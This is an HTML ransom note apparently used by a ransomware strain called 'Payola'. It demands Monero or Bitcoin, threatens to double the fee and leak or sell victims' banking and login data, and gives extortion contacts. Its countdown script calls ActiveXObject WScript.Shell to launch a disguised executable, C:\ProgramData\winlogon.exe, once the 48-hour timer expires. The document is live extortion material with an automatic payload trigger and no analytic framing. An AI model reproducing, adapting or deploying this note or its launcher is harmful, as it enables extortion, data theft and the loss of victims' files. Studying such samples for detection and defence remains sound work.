<!DOCTYPE html> <html> <head> <title>Data Recovery</title> <meta charset='UTF-8'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> </head> <style type='text/css'> body { background-color: #1f1f1f; font-family: Arial, Helvetica, sans-serif; color: #ffffff; margin: 0; padding: 0; } .container { max-width: 1250px; margin: 0 auto; padding: 10px; } header, section { margin-bottom: 20px; } h1, h2 { color: #db62bb; } a { color: #db62bb; text-decoration: none; } ul { margin: 0; padding-left: 20px; word-wrap: break-word; } .highlight { background-color: #292929; padding: 15px; border-radius: 5px; } .verify { background-color: #404040; padding: 10px; border-radius: 5px; } .attention { padding-top: 10px; background-color: #292929; padding: 15px; border-radius: 5px; text-indent: 10px; white-space: normal; } .unique-id { background-color: #404040; padding: 2px; border-radius: 5px; padding-bottom: 10px; } .user-id { display: inline-block; background-color: #292929; padding: 10px; border-radius: 5px; word-break: break-word; white-space: normal; margin-right: 20px; } .copy-btn { margin-top: 4px; margin-left: 1135px; color: #ffffff; background-color: #7f20dc; border: none; padding: 6px 20px; border-radius: 5px; cursor: pointer; text-align: center; display: justify; } .m { background: rgb(189, 54, 54); padding: 1px 2px; font-weight: bold; } @media (max-width: 600px) { h1 { font-size: 24px; } h2 { font-size: 18px; } p { font-size: 14px; } ul { font-size: 12px; } .copy-btn { font-size: 12px; } } </style> <body> <div class='container'> <header> <center> <script> function copyUserId() { var userId = document.querySelector('.user-id'); var tempInput = document.createElement('input'); tempInput.setAttribute('value', userId.textContent); document.body.appendChild(tempInput); tempInput.select(); document.execCommand('copy'); document.body.removeChild(tempInput); alert('User ID copied to clipboard.'); } </script> <h1>All your Important Files Are Stolen And Encrypted By Payola Ransomware</h1> <p> You must to pay for decryption in the form of Monero And Bitcoin. The price depends on how quickly you contact us. After payment is received, you will receive the decryption software. </p> <p> You have exactly <span style='background-color:#7f20dc;color:white;' class='m'>48 hours</span> to contact us and pay the fee. Failure to do so will result in the price being <span style='background-color:#7f20dc;color:white;' class='m'>doubled.</span> If no reply is received within <span style='background-color:#7f20dc;color:white;' class='m'>24 hours</span>,<br> contact any of the following: </p> <ul> <span style='color:white;' class='m'><a style='color:white;' href='mailto:[email protected]'>[email protected]</a></span> <span style='color:white;' class='m'><a style='color:white;' href='mailto:[email protected]'>[email protected]</a></span> </ul> </center> </header> <section class='highlight'> <center> <h2>Your Time is Running Out</h2> </style><script>var countDownDate = new Date(); countDownDate.setHours(countDownDate.getHours() + 48); countDownDate = countDownDate.getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById('tm').innerHTML = days + 'd,' + hours + ':' + minutes + ':' + seconds + ' For The Price To Be Doubled'; if (distance < 0) { clearInterval(x); document.getElementById('tm').innerHTML = 'TIMER IS UP.SAY BYE TO YOUR FILES :)'; WshShell = new ActiveXObject('WScript.Shell'); WshShell.Run('C:\ProgramData\winlogon.exe', 1, false); } }, 1000);</script><body> <div class='header'> <h2 id='tm'></h2> <p> If the timer runs out before payment is received, the decryption key will be deleted, and your files will remain encrypted permanently. All stolen data will also be leaked publicly on Tor or sold to the highest bidder. This is a one-time payment. After the ransom is paid, we will not come back. If you prefer not to pay, we may sell your personal data, including account logins, credit cards, and banking data. </p> </center> </section> <section class='verify'> <center> <h2>How Can Our Claims Be Verified?</h2> <p> Before paying, you can send us up to 3 test files for free decryption. The total size of files must be less than 2MB (non-archived), and files should not contain valuable information (databases, backups, large Excel sheets, etc.). </p> </center> </section> <section class='attention'> <h2>WARNING!</h2> <ul> <li><strong>DO NOT</strong> pay any money before decrypting the test files.</li> <li><strong>DO NOT</strong> trust any intermediary. They won't help you, and you may be a victim of a scam. Contact us directly for support during the recovery process.</li> <li><strong>DO NOT</strong> reply to other emails. ONLY these two emails can help you.</li> <li><strong>DO NOT</strong> rename encrypted files, as this is how the decryption software identifies which files to decrypt.</li> <li><strong>DO NOT</strong> try to decrypt your data using third-party software, as it may cause permanent data loss.</li> <li>Decryption of your files with the help of third parties may result in an increased price or make you a victim of a scam.</li> </ul> </section> <section class='unique-id'> <ul> <h2>Your Unique ID</h2> <center> <div class='user-id'> USERID </div> </center> <button class='copy-btn' onclick='copyUserId()'>Copy</button> </ul> </section> </div> <br><br> <br><br> </body> </html>